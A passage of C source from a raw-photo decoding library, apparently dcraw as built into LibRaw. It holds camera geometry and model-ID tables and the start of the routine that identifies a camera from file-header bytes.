fread (test[t], 2, 1, ifp);
for (msb=0; msb < 2; msb++) {
diff = (test[t^2][msb] << 8 | test[t^2][!msb])
- (test[t ][msb] << 8 | test[t ][!msb]);
sum[msb] += diff*diff;
}
t = (t+1) & 3;
}
return sum[0] < sum[1] ? 0x4d4d : 0x4949;
}
float CLASS find_green (int bps, int bite, int off0, int off1)
{
UINT64 bitbuf=0;
int vbits, col, i, c;
ushort img[2][2064];
double sum[] = {0, 0};
if(width > 2064) return 0.f; // too wide
FORC(2) {
fseek (ifp, c ? off1:off0, SEEK_SET);
for (vbits=col=0; col < width; col++) {
for (vbits -= bps; vbits < 0; vbits += bite) {
bitbuf <<= bite;
for (i=0; i < bite; i+=8)
bitbuf |= (unsigned) (fgetc(ifp) << i);
}
img[c][col] = bitbuf << (64-bps-vbits) >> (64-bps);
}
}
FORC(width-1) {
sum[ c & 1] += ABS(img[0][c]-img[1][c+1]);
sum[~c & 1] += ABS(img[1][c]-img[0][c+1]);
}
return 100 * log(sum[0]/sum[1]);
}
#ifdef LIBRAW_LIBRARY_BUILD
static void remove_trailing_spaces(char *string, size_t len)
{
if (len < 1)
return; // not needed, b/c sizeof of make/model is 64
string[len - 1] = 0;
if (len < 3)
return; // also not needed
len = strnlen(string, len - 1);
for (int i = len - 1; i >= 0; i--)
{
if (isspace((unsigned char)string[i]))
string[i] = 0;
else
break;
}
}
#endif
/*
Identify which camera created this file, and set global variables
accordingly.
*/
void CLASS identify()
{
static const short pana[][6] = {
{ 3130, 1743, 4, 0, -6, 0 },
{ 3130, 2055, 4, 0, -6, 0 },
{ 3130, 2319, 4, 0, -6, 0 },
{ 3170, 2103, 18, 0,-42, 20 },
{ 3170, 2367, 18, 13,-42,-21 },
{ 3177, 2367, 0, 0, -1, 0 },
{ 3304, 2458, 0, 0, -1, 0 },
{ 3330, 2463, 9, 0, -5, 0 },
{ 3330, 2479, 9, 0,-17, 4 },
{ 3370, 1899, 15, 0,-44, 20 },
{ 3370, 2235, 15, 0,-44, 20 },
{ 3370, 2511, 15, 10,-44,-21 },
{ 3690, 2751, 3, 0, -8, -3 },
{ 3710, 2751, 0, 0, -3, 0 },
{ 3724, 2450, 0, 0, 0, -2 },
{ 3770, 2487, 17, 0,-44, 19 },
{ 3770, 2799, 17, 15,-44,-19 },
{ 3880, 2170, 6, 0, -6, 0 },
{ 4060, 3018, 0, 0, 0, -2 },
{ 4290, 2391, 3, 0, -8, -1 },
{ 4330, 2439, 17, 15,-44,-19 },
{ 4508, 2962, 0, 0, -3, -4 },
{ 4508, 3330, 0, 0, -3, -6 },
};
static const ushort canon[][11] = {
{ 1944, 1416, 0, 0, 48, 0 },
{ 2144, 1560, 4, 8, 52, 2, 0, 0, 0, 25 },
{ 2224, 1456, 48, 6, 0, 2 },
{ 2376, 1728, 12, 6, 52, 2 },
{ 2672, 1968, 12, 6, 44, 2 },
{ 3152, 2068, 64, 12, 0, 0, 16 },
{ 3160, 2344, 44, 12, 4, 4 },
{ 3344, 2484, 4, 6, 52, 6 },
{ 3516, 2328, 42, 14, 0, 0 },
{ 3596, 2360, 74, 12, 0, 0 },
{ 3744, 2784, 52, 12, 8, 12 },
{ 3944, 2622, 30, 18, 6, 2 },
{ 3948, 2622, 42, 18, 0, 2 },
{ 3984, 2622, 76, 20, 0, 2, 14 },
{ 4104, 3048, 48, 12, 24, 12 },
{ 4116, 2178, 4, 2, 0, 0 },
{ 4152, 2772, 192, 12, 0, 0 },
{ 4160, 3124, 104, 11, 8, 65 },
{ 4176, 3062, 96, 17, 8, 0, 0, 16, 0, 7, 0x49 },
{ 4192, 3062, 96, 17, 24, 0, 0, 16, 0, 0, 0x49 },
{ 4312, 2876, 22, 18, 0, 2 },
{ 4352, 2874, 62, 18, 0, 0 },
{ 4476, 2954, 90, 34, 0, 0 },
{ 4480, 3348, 12, 10, 36, 12, 0, 0, 0, 18, 0x49 },
{ 4480, 3366, 80, 50, 0, 0 },
{ 4496, 3366, 80, 50, 12, 0 },
{ 4768, 3516, 96, 16, 0, 0, 0, 16 },
{ 4832, 3204, 62, 26, 0, 0 },
{ 4832, 3228, 62, 51, 0, 0 },
{ 5108, 3349, 98, 13, 0, 0 },
{ 5120, 3318, 142, 45, 62, 0 },
{ 5280, 3528, 72, 52, 0, 0 }, /* EOS M */
{ 5344, 3516, 142, 51, 0, 0 },
{ 5344, 3584, 126,100, 0, 2 },
{ 5360, 3516, 158, 51, 0, 0 },
{ 5568, 3708, 72, 38, 0, 0 },
{ 5632, 3710, 96, 17, 0, 0, 0, 16, 0, 0, 0x49 },
{ 5712, 3774, 62, 20, 10, 2 },
{ 5792, 3804, 158, 51, 0, 0 },
{ 5920, 3950, 122, 80, 2, 0 },
{ 6096, 4056, 72, 34, 0, 0 }, /* EOS M3 */
{ 6288, 4056, 266, 36, 0, 0 }, /* EOS 80D */
{ 6880, 4544, 136, 42, 0, 0 }, /* EOS 5D4 */
{ 8896, 5920, 160, 64, 0, 0 },
};
static const struct {
ushort id;
char t_model[20];
} unique[] = {
{ 0x001, "EOS-1D" },
{ 0x167, "EOS-1DS" },
{ 0x168, "EOS 10D" },
{ 0x169, "EOS-1D Mark III" },
{ 0x170, "EOS 300D" },
{ 0x174, "EOS-1D Mark II" },
{ 0x175, "EOS 20D" },
{ 0x176, "EOS 450D" },
{ 0x188, "EOS-1Ds Mark II" },
{ 0x189, "EOS 350D" },
{ 0x190, "EOS 40D" },
{ 0x213, "EOS 5D" },
{ 0x215, "EOS-1Ds Mark III" },
{ 0x218, "EOS 5D Mark II" },
{ 0x232, "EOS-1D Mark II N" },
{ 0x234, "EOS 30D" },
{ 0x236, "EOS 400D" },
{ 0x250, "EOS 7D" },
{ 0x252, "EOS 500D" },
{ 0x254, "EOS 1000D" },
{ 0x261, "EOS 50D" },
{ 0x269, "EOS-1D X" },
{ 0x270, "EOS 550D" },
{ 0x281, "EOS-1D Mark IV" },
{ 0x285, "EOS 5D Mark III" },
{ 0x286, "EOS 600D" },
{ 0x287, "EOS 60D" },
{ 0x288, "EOS 1100D" },
{ 0x289, "EOS 7D Mark II" },
{ 0x301, "EOS 650D" },
{ 0x302, "EOS 6D" },
{ 0x324, "EOS-1D C" },
{ 0x325, "EOS 70D" },
{ 0x326, "EOS 700D" },
{ 0x327, "EOS 1200D" },
{ 0x328, "EOS-1D X Mark II" },
{ 0x331, "EOS M" },
{ 0x335, "EOS M2" },
{ 0x374, "EOS M3"}, /* temp */
{ 0x384, "EOS M10"}, /* temp */
{ 0x394, "EOS M5"}, /* temp */
{ 0x346, "EOS 100D" },
{ 0x347, "EOS 760D" },
{ 0x349, "EOS 5D Mark IV" },
{ 0x350, "EOS 80D"},
{ 0x382, "EOS 5DS" },
{ 0x393, "EOS 750D" },
{ 0x401, "EOS 5DS R" },
{ 0x404, "EOS 1300D" },
}, sonique[] = {
{ 0x002, "DSC-R1" },
{ 0x100, "DSLR-A100" },
{ 0x101, "DSLR-A900" },
{ 0x102, "DSLR-A700" },
{ 0x103, "DSLR-A200" },
{ 0x104, "DSLR-A350" },
{ 0x105, "DSLR-A300" },
{ 0x106, "DSLR-A900" },
{ 0x107, "DSLR-A380" },
{ 0x108, "DSLR-A330" },
{ 0x109, "DSLR-A230" },
{ 0x10a, "DSLR-A290" },
{ 0x10d, "DSLR-A850" },
{ 0x10e, "DSLR-A850" },
{ 0x111, "DSLR-A550" },
{ 0x112, "DSLR-A500" },
{ 0x113, "DSLR-A450" },
{ 0x116, "NEX-5" },
{ 0x117, "NEX-3" },
{ 0x118, "SLT-A33" },
{ 0x119, "SLT-A55V" },
{ 0x11a, "DSLR-A560" },
{ 0x11b, "DSLR-A580" },
{ 0x11c, "NEX-C3" },
{ 0x11d, "SLT-A35" },
{ 0x11e, "SLT-A65V" },
{ 0x11f, "SLT-A77V" },
{ 0x120, "NEX-5N" },
{ 0x121, "NEX-7" },
{ 0x122, "NEX-VG20E"},
{ 0x123, "SLT-A37" },
{ 0x124, "SLT-A57" },
{ 0x125, "NEX-F3" },
{ 0x126, "SLT-A99V" },
{ 0x127, "NEX-6" },
{ 0x128, "NEX-5R" },
{ 0x129, "DSC-RX100" },
{ 0x12a, "DSC-RX1" },
{ 0x12b, "NEX-VG900" },
{ 0x12c, "NEX-VG30E" },
{ 0x12e, "ILCE-3000" },
{ 0x12f, "SLT-A58" },
{ 0x131, "NEX-3N" },
{ 0x132, "ILCE-7" },
{ 0x133, "NEX-5T" },
{ 0x134, "DSC-RX100M2" },
{ 0x135, "DSC-RX10" },
{ 0x136, "DSC-RX1R" },
{ 0x137, "ILCE-7R" },
{ 0x138, "ILCE-6000" },
{ 0x139, "ILCE-5000" },
{ 0x13d, "DSC-RX100M3" },
{ 0x13e, "ILCE-7S" },
{ 0x13f, "ILCA-77M2" },
{ 0x153, "ILCE-5100" },
{ 0x154, "ILCE-7M2" },
{ 0x155, "DSC-RX100M4" },
{ 0x156, "DSC-RX10M2" },
{ 0x158, "DSC-RX1RM2" },
{ 0x15a, "ILCE-QX1" },
{ 0x15b, "ILCE-7RM2" },
{ 0x15e, "ILCE-7SM2" },
{ 0x161, "ILCA-68" },
{ 0x162, "ILCA-99M2" },
{ 0x163, "DSC-RX10M3" },
{ 0x164, "DSC-RX100M5"},
{ 0x165, "ILCE-6300" },
{ 0x168, "ILCE-6500"},
};
#ifdef LIBRAW_LIBRARY_BUILD
static const libraw_custom_camera_t
const_table[]
#else
static const struct {
unsigned fsize;
ushort rw, rh;
uchar lm, tm, rm, bm, lf, cf, max, flags;
char t_make[10], t_model[20];
ushort offset;
}
table[]
#endif
= {
{ 786432,1024, 768, 0, 0, 0, 0, 0,0x94,0,0,"AVT","F-080C" },
{ 1447680,1392,1040, 0, 0, 0, 0, 0,0x94,0,0,"AVT","F-145C" },
{ 1920000,1600,1200, 0, 0, 0, 0, 0,0x94,0,0,"AVT","F-201C" },
{ 5067304,2588,1958, 0, 0, 0, 0, 0,0x94,0,0,"AVT","F-510C" },
{ 5067316,2588,1958, 0, 0, 0, 0, 0,0x94,0,0,"AVT","F-510C",12 },
{ 10134608,2588,1958, 0, 0, 0, 0, 9,0x94,0,0,"AVT","F-510C" },
{ 10134620,2588,1958, 0, 0, 0, 0, 9,0x94,0,0,"AVT","F-510C",12 },
{ 16157136,3272,2469, 0, 0, 0, 0, 9,0x94,0,0,"AVT","F-810C" },
{ 15980544,3264,2448, 0, 0, 0, 0, 8,0x61,0,1,"AgfaPhoto","DC-833m" },
{ 9631728,2532,1902, 0, 0, 0, 0,96,0x61,0,0,"Alcatel","5035D" },
{ 31850496,4608,3456, 0, 0, 0, 0,0,0x94,0,0,"GITUP","GIT2 4:3" },
{ 23887872,4608,2592, 0, 0, 0, 0,0,0x94,0,0,"GITUP","GIT2 16:9" },
// Android Raw dumps id start
// File Size in bytes Horizontal Res Vertical Flag then bayer order eg 0x16 bbgr 0x94 rggb
{ 1540857,2688,1520, 0, 0, 0, 0, 1,0x61,0,0,"Samsung","S3" },
{ 2658304,1212,1096, 0, 0, 0, 0, 1 ,0x16,0,0,"LG","G3FrontMipi" },
{ 2842624,1296,1096, 0, 0, 0, 0, 1 ,0x16,0,0,"LG","G3FrontQCOM" },
{ 2969600,1976,1200, 0, 0, 0, 0, 1 ,0x16,0,0,"Xiaomi","MI3wMipi" },
{ 3170304,1976,1200, 0, 0, 0, 0, 1 ,0x16,0,0,"Xiaomi","MI3wQCOM" },
{ 3763584,1584,1184, 0, 0, 0, 0, 96,0x61,0,0,"I_Mobile","I_StyleQ6" },
{ 5107712,2688,1520, 0, 0, 0, 0, 1 ,0x61,0,0,"OmniVisi","UltraPixel1" },
{ 5382640,2688,1520, 0, 0, 0, 0, 1 ,0x61,0,0,"OmniVisi","UltraPixel2" },
{ 5664912,2688,1520, 0, 0, 0, 0, 1 ,0x61,0,0,"OmniVisi","4688" },
{ 5664912,2688,1520, 0, 0, 0, 0, 1 ,0x61,0,0,"OmniVisi","4688" },
{ 5364240,2688,1520, 0, 0, 0, 0, 1 ,0x61,0,0,"OmniVisi","4688" },
{ 6299648,2592,1944, 0, 0, 0, 0, 1 ,0x16,0,0,"OmniVisi","OV5648" },
{ 6721536,2592,1944, 0, 0, 0, 0, 0 ,0x16,0,0,"OmniVisi","OV56482" },
{ 6746112,2592,1944, 0, 0, 0, 0, 0 ,0x16,0,0,"HTC","OneSV" },
{ 9631728,2532,1902, 0, 0, 0, 0, 96,0x61,0,0,"Sony","5mp" },
{ 9830400,2560,1920, 0, 0, 0, 0, 96,0x61,0,0,"NGM","ForwardArt" },
{ 10186752,3264,2448, 0, 0, 0, 0, 1,0x94,0,0,"Sony","IMX219-mipi 8mp" },
{ 10223360,2608,1944, 0, 0, 0, 0, 96,0x16,0,0,"Sony","IMX" },
{ 10782464,3282,2448, 0, 0, 0, 0, 0 ,0x16,0,0,"HTC","MyTouch4GSlide" },
{ 10788864,3282,2448, 0, 0, 0, 0, 0, 0x16,0,0,"Xperia","L" },
{ 15967488,3264,2446, 0, 0, 0, 0, 96,0x16,0,0,"OmniVison","OV8850" },
{ 16224256,4208,3082, 0, 0, 0, 0, 1, 0x16,0,0,"LG","G3MipiL" },
{ 16424960,4208,3120, 0, 0, 0, 0, 1, 0x16,0,0,"IMX135","MipiL" },
{ 17326080,4164,3120, 0, 0, 0, 0, 1, 0x16,0,0,"LG","G3LQCom" },
{ 17522688,4212,3120, 0, 0, 0, 0, 0,0x16,0,0,"Sony","IMX135-QCOM" },
{ 19906560,4608,3456, 0, 0, 0, 0, 1, 0x16,0,0,"Gione","E7mipi" },
{ 19976192,5312,2988, 0, 0, 0, 0, 1, 0x16,0,0,"LG","G4" },
{ 20389888,4632,3480, 0, 0, 0, 0, 1, 0x16,0,0,"Xiaomi","RedmiNote3Pro" },
{ 20500480,4656,3496, 0, 0, 0, 0, 1,0x94,0,0,"Sony","IMX298-mipi 16mp" },
{ 21233664,4608,3456, 0, 0, 0, 0, 1, 0x16,0,0,"Gione","E7qcom" },
{ 26023936,4192,3104, 0, 0, 0, 0, 96,0x94,0,0,"THL","5000" },
{ 26257920,4208,3120, 0, 0, 0, 0, 96,0x94,0,0,"Sony","IMX214" },
{ 26357760,4224,3120, 0, 0, 0, 0, 96,0x61,0,0,"OV","13860" },
{ 41312256,5248,3936, 0, 0, 0, 0, 96,0x61,0,0,"Meizu","MX4" },
{ 42923008,5344,4016, 0, 0, 0, 0, 96,0x61,0,0,"Sony","IMX230" },
// Android Raw dumps id end
{ 20137344,3664,2748,0, 0, 0, 0,0x40,0x49,0,0,"Aptina","MT9J003",0xffff },
{ 2868726,1384,1036, 0, 0, 0, 0,64,0x49,0,8,"Baumer","TXG14",1078 },
{ 5298000,2400,1766,12,12,44, 2,40,0x94,0,2,"Canon","PowerShot SD300" },
{ 6553440,2664,1968, 4, 4,44, 4,40,0x94,0,2,"Canon","PowerShot A460" },
{ 6573120,2672,1968,12, 8,44, 0,40,0x94,0,2,"Canon","PowerShot A610" },
{ 6653280,2672,1992,10, 6,42, 2,40,0x94,0,2,"Canon","PowerShot A530" },
{ 7710960,2888,2136,44, 8, 4, 0,40,0x94,0,2,"Canon","PowerShot S3 IS" },
{ 9219600,3152,2340,36,12, 4, 0,40,0x94,0,2,"Canon","PowerShot A620" },
{ 9243240,3152,2346,12, 7,44,13,40,0x49,0,2,"Canon","PowerShot A470" },
{ 10341600,3336,2480, 6, 5,32, 3,40,0x94,0,2,"Canon","PowerShot A720 IS" },
{ 10383120,3344,2484,12, 6,44, 6,40,0x94,0,2,"Canon","PowerShot A630" },
{ 12945240,3736,2772,12, 6,52, 6,40,0x94,0,2,"Canon","PowerShot A640" },
{ 15636240,4104,3048,48,12,24,12,40,0x94,0,2,"Canon","PowerShot A650" },
{ 15467760,3720,2772, 6,12,30, 0,40,0x94,0,2,"Canon","PowerShot SX110 IS" },
{ 15534576,3728,2778,12, 9,44, 9,40,0x94,0,2,"Canon","PowerShot SX120 IS" },
{ 18653760,4080,3048,24,12,24,12,40,0x94,0,2,"Canon","PowerShot SX20 IS" },
{ 19131120,4168,3060,92,16, 4, 1,40,0x94,0,2,"Canon","PowerShot SX220 HS" },
{ 21936096,4464,3276,25,10,73,12,40,0x16,0,2,"Canon","PowerShot SX30 IS" },
{ 24724224,4704,3504, 8,16,56, 8,40,0x49,0,2,"Canon","PowerShot A3300 IS" },
{ 30858240,5248,3920, 8,16,56,16,40,0x94,0,2,"Canon","IXUS 160" },
{ 1976352,1632,1211, 0, 2, 0, 1, 0,0x94,0,1,"Casio","QV-2000UX" },
{ 3217760,2080,1547, 0, 0,10, 1, 0,0x94,0,1,"Casio","QV-3*00EX" },
{ 6218368,2585,1924, 0, 0, 9, 0, 0,0x94,0,1,"Casio","QV-5700" },
{ 7816704,2867,2181, 0, 0,34,36, 0,0x16,0,1,"Casio","EX-Z60" },
{ 2937856,1621,1208, 0, 0, 1, 0, 0,0x94,7,13,"Casio","EX-S20" },
{ 4948608,2090,1578, 0, 0,32,34, 0,0x94,7,1,"Casio","EX-S100" },
{ 6054400,2346,1720, 2, 0,32, 0, 0,0x94,7,1,"Casio","QV-R41" },
{ 7426656,2568,1928, 0, 0, 0, 0, 0,0x94,0,1,"Casio","EX-P505" },
{ 7530816,2602,1929, 0, 0,22, 0, 0,0x94,7,1,"Casio","QV-R51" },
{ 7542528,2602,1932, 0, 0,32, 0, 0,0x94,7,1,"Casio","EX-Z50" },
{ 7562048,2602,1937, 0, 0,25, 0, 0,0x16,7,1,"Casio","EX-Z500" },
{ 7753344,2602,1986, 0, 0,32,26, 0,0x94,7,1,"Casio","EX-Z55" },
{ 9313536,2858,2172, 0, 0,14,30, 0,0x94,7,1,"Casio","EX-P600" },
{ 10834368,3114,2319, 0, 0,27, 0, 0,0x94,0,1,"Casio","EX-Z750" },
{ 10843712,3114,2321, 0, 0,25, 0, 0,0x94,0,1,"Casio","EX-Z75" },
{ 10979200,3114,2350, 0, 0,32,32, 0,0x94,7,1,"Casio","EX-P700" },
{ 12310144,3285,2498, 0, 0, 6,30, 0,0x94,0,1,"Casio","EX-Z850" },
{ 12489984,3328,2502, 0, 0,47,35, 0,0x94,0,1,"Casio","EX-Z8" },
{ 15499264,3754,2752, 0, 0,82, 0, 0,0x94,0,1,"Casio","EX-Z1050" },
{ 18702336,4096,3044, 0, 0,24, 0,80,0x94,7,1,"Casio","EX-ZR100" },
{ 7684000,2260,1700, 0, 0, 0, 0,13,0x94,0,1,"Casio","QV-4000" },
{ 787456,1024, 769, 0, 1, 0, 0, 0,0x49,0,0,"Creative","PC-CAM 600" },
{ 28829184,4384,3288, 0, 0, 0, 0,36,0x61,0,0,"DJI" },
{ 15151104,4608,3288, 0, 0, 0, 0, 0,0x94,0,0,"Matrix" },
{ 3840000,1600,1200, 0, 0, 0, 0,65,0x49,0,0,"Foculus","531C" },
{ 307200, 640, 480, 0, 0, 0, 0, 0,0x94,0,0,"Generic" },
{ 62464, 256, 244, 1, 1, 6, 1, 0,0x8d,0,0,"Kodak","DC20" },
{ 124928, 512, 244, 1, 1,10, 1, 0,0x8d,0,0,"Kodak","DC20" },
{ 1652736,1536,1076, 0,52, 0, 0, 0,0x61,0,0,"Kodak","DCS200" },
{ 4159302,2338,1779, 1,33, 1, 2, 0,0x94,0,0,"Kodak","C330" },
{ 4162462,2338,1779, 1,33, 1, 2, 0,0x94,0,0,"Kodak","C330",3160 },
{ 2247168,1232, 912, 0, 0,16, 0, 0,0x00,0,0,"Kodak","C330" },
{ 3370752,1232, 912, 0, 0,16, 0, 0,0x00,0,0,"Kodak","C330" },
{ 6163328,2864,2152, 0, 0, 0, 0, 0,0x94,0,0,"Kodak","C603" },
{ 6166488,2864,2152, 0, 0, 0, 0, 0,0x94,0,0,"Kodak","C603",3160 },
{ 460800, 640, 480, 0, 0, 0, 0, 0,0x00,0,0,"Kodak","C603" },
{ 9116448,2848,2134, 0, 0, 0, 0, 0,0x00,0,0,"Kodak","C603" },
{ 12241200,4040,3030, 2, 0, 0,13, 0,0x49,0,0,"Kodak","12MP" },
{ 12272756,4040,3030, 2, 0, 0,13, 0,0x49,0,0,"Kodak","12MP",31556 },
{ 18000000,4000,3000, 0, 0, 0, 0, 0,0x00,0,0,"Kodak","12MP" },
{ 614400, 640, 480, 0, 3, 0, 0,64,0x94,0,0,"Kodak","KAI-0340" },
{ 15360000,3200,2400, 0, 0, 0, 0,96,0x16,0,0,"Lenovo","A820" },
{ 3884928,1608,1207, 0, 0, 0, 0,96,0x16,0,0,"Micron","2010",3212 },
{ 1138688,1534, 986, 0, 0, 0, 0, 0,0x61,0,0,"Minolta","RD175",513 },
{ 1581060,1305, 969, 0, 0,18, 6, 6,0x1e,4,1,"Nikon","E900" },
{ 2465792,1638,1204, 0, 0,22, 1, 6,0x4b,5,1,"Nikon","E950" },
{ 2940928,1616,1213, 0, 0, 0, 7,30,0x94,0,1,"Nikon","E2100" },
{ 4771840,2064,1541, 0, 0, 0, 1, 6,0xe1,0,1,"Nikon","E990" },
{ 4775936,2064,1542, 0, 0, 0, 0,30,0x94,0,1,"Nikon","E3700" },
{ 5865472,2288,1709, 0, 0, 0, 1, 6,0xb4,0,1,"Nikon","E4500" },
{ 5869568,2288,1710, 0, 0, 0, 0, 6,0x16,0,1,"Nikon","E4300" },
{ 7438336,2576,1925, 0, 0, 0, 1, 6,0xb4,0,1,"Nikon","E5000" },
{ 8998912,2832,2118, 0, 0, 0, 0,30,0x94,7,1,"Nikon","COOLPIX S6" },
{ 5939200,2304,1718, 0, 0, 0, 0,30,0x16,0,0,"Olympus","C770UZ" },
{ 3178560,2064,1540, 0, 0, 0, 0, 0,0x94,0,1,"Pentax","Optio S" },
{ 4841984,2090,1544, 0, 0,22, 0, 0,0x94,7,1,"Pentax","Optio S" },
{ 6114240,2346,1737, 0, 0,22, 0, 0,0x94,7,1,"Pentax","Optio S4" },
{ 10702848,3072,2322, 0, 0, 0,21,30,0x94,0,1,"Pentax","Optio 750Z" },
{ 4147200,1920,1080, 0, 0, 0, 0, 0,0x49,0,0,"Photron","BC2-HD" },
{ 4151666,1920,1080, 0, 0, 0, 0, 0,0x49,0,0,"Photron","BC2-HD",8 },
{ 13248000,2208,3000, 0, 0, 0, 0,13,0x61,0,0,"Pixelink","A782" },
{ 6291456,2048,1536, 0, 0, 0, 0,96,0x61,0,0,"RoverShot","3320AF" },
{ 311696, 644, 484, 0, 0, 0, 0, 0,0x16,0,8,"ST Micro","STV680 VGA" },
{ 16098048,3288,2448, 0, 0,24, 0, 9,0x94,0,1,"Samsung","S85" },
{ 16215552,3312,2448, 0, 0,48, 0, 9,0x94,0,1,"Samsung","S85" },
{ 20487168,3648,2808, 0, 0, 0, 0,13,0x94,5,1,"Samsung","WB550" },
{ 24000000,4000,3000, 0, 0, 0, 0,13,0x94,5,1,"Samsung","WB550" },
{ 12582980,3072,2048, 0, 0, 0, 0,33,0x61,0,0,"Sinar","",68 },
{ 33292868,4080,4080, 0, 0, 0, 0,33,0x61,0,0,"Sinar","",68 },
{ 44390468,4080,5440, 0, 0, 0, 0,33,0x61,0,0,"Sinar","",68 },
{ 1409024,1376,1024, 0, 0, 1, 0, 0,0x49,0,0,"Sony","XCD-SX910CR" },
{ 2818048,1376,1024, 0, 0, 1, 0,97,0x49,0,0,"Sony","XCD-SX910CR" },
};
#ifdef LIBRAW_LIBRARY_BUILD
libraw_custom_camera_t
table[64 + sizeof(const_table)/sizeof(const_table[0])];
#endif
static const char *corp[] =
{ "AgfaPhoto", "Canon", "Casio", "Epson", "Fujifilm",
"Mamiya", "Minolta", "Motorola", "Kodak", "Konica", "Leica",
"Nikon", "Nokia", "Olympus", "Pentax", "Phase One", "Ricoh",
"Samsung", "Sigma", "Sinar", "Sony" };
#ifdef LIBRAW_LIBRARY_BUILD
char head[64], *cp;
#else
char head[32], *cp;
#endif
int hlen, flen, fsize, zero_fsize=1, i, c;
struct jhead jh;
#ifdef LIBRAW_LIBRARY_BUILD
unsigned camera_count = parse_custom_cameras(64,table,imgdata.params.custom_camera_strings);
for(int q = 0; q < sizeof(const_table)/sizeof(const_table[0]); q++)
memmove(&table[q+camera_count],&const_table[q],sizeof(const_table[0]));
camera_count += sizeof(const_table)/sizeof(const_table[0]);
#endif
tiff_flip = flip = filters = UINT_MAX; /* unknown */
raw_height = raw_width = fuji_width = fuji_layout = cr2_slice[0] = 0;
maximum = height = width = top_margin = left_margin = 0;
cdesc[0] = desc[0] = artist[0] = make[0] = model[0] = model2[0] = 0;
iso_speed = shutter = aperture = focal_len = unique_id = 0;
tiff_nifds = 0;
memset (tiff_ifd, 0, sizeof tiff_ifd);
memset (gpsdata, 0, sizeof gpsdata);
memset (cblack, 0, sizeof cblack);
memset (white, 0, sizeof white);
memset (mask, 0, sizeof mask);
thumb_offset = thumb_length = thumb_width = thumb_height = 0;
load_raw = thumb_load_raw = 0;
write_thumb = &CLASS jpeg_thumb;
data_offset = meta_offset = meta_length = tiff_bps = tiff_compress = 0;
kodak_cbpp = zero_after_ff = dng_version = load_flags = 0;
timestamp = shot_order = tiff_samples = black = is_foveon = 0;
mix_green = profile_length = data_error = zero_is_bad = 0;
pixel_aspect = is_raw = raw_color = 1;
tile_width = tile_length = 0;
for (i=0; i < 4; i++) {
cam_mul[i] = i == 1;
pre_mul[i] = i < 3;
FORC3 cmatrix[c][i] = 0;
FORC3 rgb_cam[c][i] = c == i;
}
colors = 3;
for (i=0; i < 0x10000; i++) curve[i] = i;
order = get2();
hlen = get4();
fseek (ifp, 0, SEEK_SET);
#ifdef LIBRAW_LIBRARY_BUILD
fread (head, 1, 64, ifp);
libraw_internal_data.unpacker_data.lenRAFData = libraw_internal_data.unpacker_data.posRAFData = 0;
#else
fread (head, 1, 32, ifp);
#endif
fseek (ifp, 0, SEEK_END);
flen = fsize = ftell(ifp);
if ((cp = (char *) memmem (head, 32, (char*)"MMMM", 4)) ||
(cp = (char *) memmem (head, 32, (char*)"IIII", 4))) {
parse_phase_one (cp-head);
if (cp-head && parse_tiff(0)) apply_tiff();
} else if (order == 0x4949 || order == 0x4d4d) {
if (!memcmp (head+6,"HEAPCCDR",8)) {
data_offset = hlen;
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
#endif
parse_ciff (hlen, flen-hlen, 0);
load_raw = &CLASS canon_load_raw;
} else if (parse_tiff(0)) apply_tiff();
} else if (!memcmp (head,"\xff\xd8\xff\xe1",4) &&
!memcmp (head+6,"Exif",4)) {
fseek (ifp, 4, SEEK_SET);
data_offset = 4 + get2();
fseek (ifp, data_offset, SEEK_SET);
if (fgetc(ifp) != 0xff)
parse_tiff(12);
thumb_offset = 0;
} else if (!memcmp (head+25,"ARECOYK",7)) {
strcpy (make, "Contax");
strcpy (model,"N Digital");
fseek (ifp, 33, SEEK_SET);
get_timestamp(1);
fseek (ifp, 52, SEEK_SET);
switch (get4()) {
case 7: iso_speed = 25; break;
case 8: iso_speed = 32; break;
case 9: iso_speed = 40; break;
case 10: iso_speed = 50; break;
case 11: iso_speed = 64; break;
case 12: iso_speed = 80; break;
case 13: iso_speed = 100; break;
case 14: iso_speed = 125; break;
case 15: iso_speed = 160; break;
case 16: iso_speed = 200; break;
case 17: iso_speed = 250; break;
case 18: iso_speed = 320; break;
case 19: iso_speed = 400; break;
}
shutter = libraw_powf64(2.0f, (((float)get4())/8.0f)) / 16000.0f;
FORC4 cam_mul[c ^ (c >> 1)] = get4();
fseek (ifp, 88, SEEK_SET);
aperture = libraw_powf64(2.0f, ((float)get4())/16.0f);
fseek (ifp, 112, SEEK_SET);
focal_len = get4();
#ifdef LIBRAW_LIBRARY_BUILD
fseek (ifp, 104, SEEK_SET);
imgdata.lens.makernotes.MaxAp4CurFocal = libraw_powf64(2.0f, ((float)get4())/16.0f);
fseek (ifp, 124, SEEK_SET);
stmread(imgdata.lens.makernotes.Lens, 32, ifp);
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Contax_N;
if (imgdata.lens.makernotes.Lens[0])
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Contax_N;
#endif
} else if (!strcmp (head, "PXN")) {
strcpy (make, "Logitech");
strcpy (model,"Fotoman Pixtura");
} else if (!strcmp (head, "qktk")) {
strcpy (make, "Apple");
strcpy (model,"QuickTake 100");
load_raw = &CLASS quicktake_100_load_raw;
} else if (!strcmp (head, "qktn")) {
strcpy (make, "Apple");
strcpy (model,"QuickTake 150");
load_raw = &CLASS kodak_radc_load_raw;
} else if (!memcmp (head,"FUJIFILM",8)) {
#ifdef LIBRAW_LIBRARY_BUILD
strcpy(model, head+0x1c);
memcpy(model2, head+0x3c, 4);
model2[4]=0;
#endif
fseek (ifp, 84, SEEK_SET);
thumb_offset = get4();
thumb_length = get4();
fseek (ifp, 92, SEEK_SET);
parse_fuji (get4());
if (thumb_offset > 120) {
fseek (ifp, 120, SEEK_SET);
is_raw += (i = get4())?1:0;
if (is_raw == 2 && shot_select)
parse_fuji (i);
}
load_raw = &CLASS unpacked_load_raw;
fseek (ifp, 100+28*(shot_select > 0), SEEK_SET);
parse_tiff (data_offset = get4());
parse_tiff (thumb_offset+12);
apply_tiff();
} else if (!memcmp (head,"RIFF",4)) {
fseek (ifp, 0, SEEK_SET);
parse_riff();
} else if (!memcmp (head+4,"ftypqt ",9)) {
fseek (ifp, 0, SEEK_SET);
parse_qt (fsize);
is_raw = 0;
} else if (!memcmp (head,"\0\001\0\001\0@",6)) {
fseek (ifp, 6, SEEK_SET);
fread (make, 1, 8, ifp);
fread (model, 1, 8, ifp);
fread (model2, 1, 16, ifp);
data_offset = get2();
get2();
raw_width = get2();
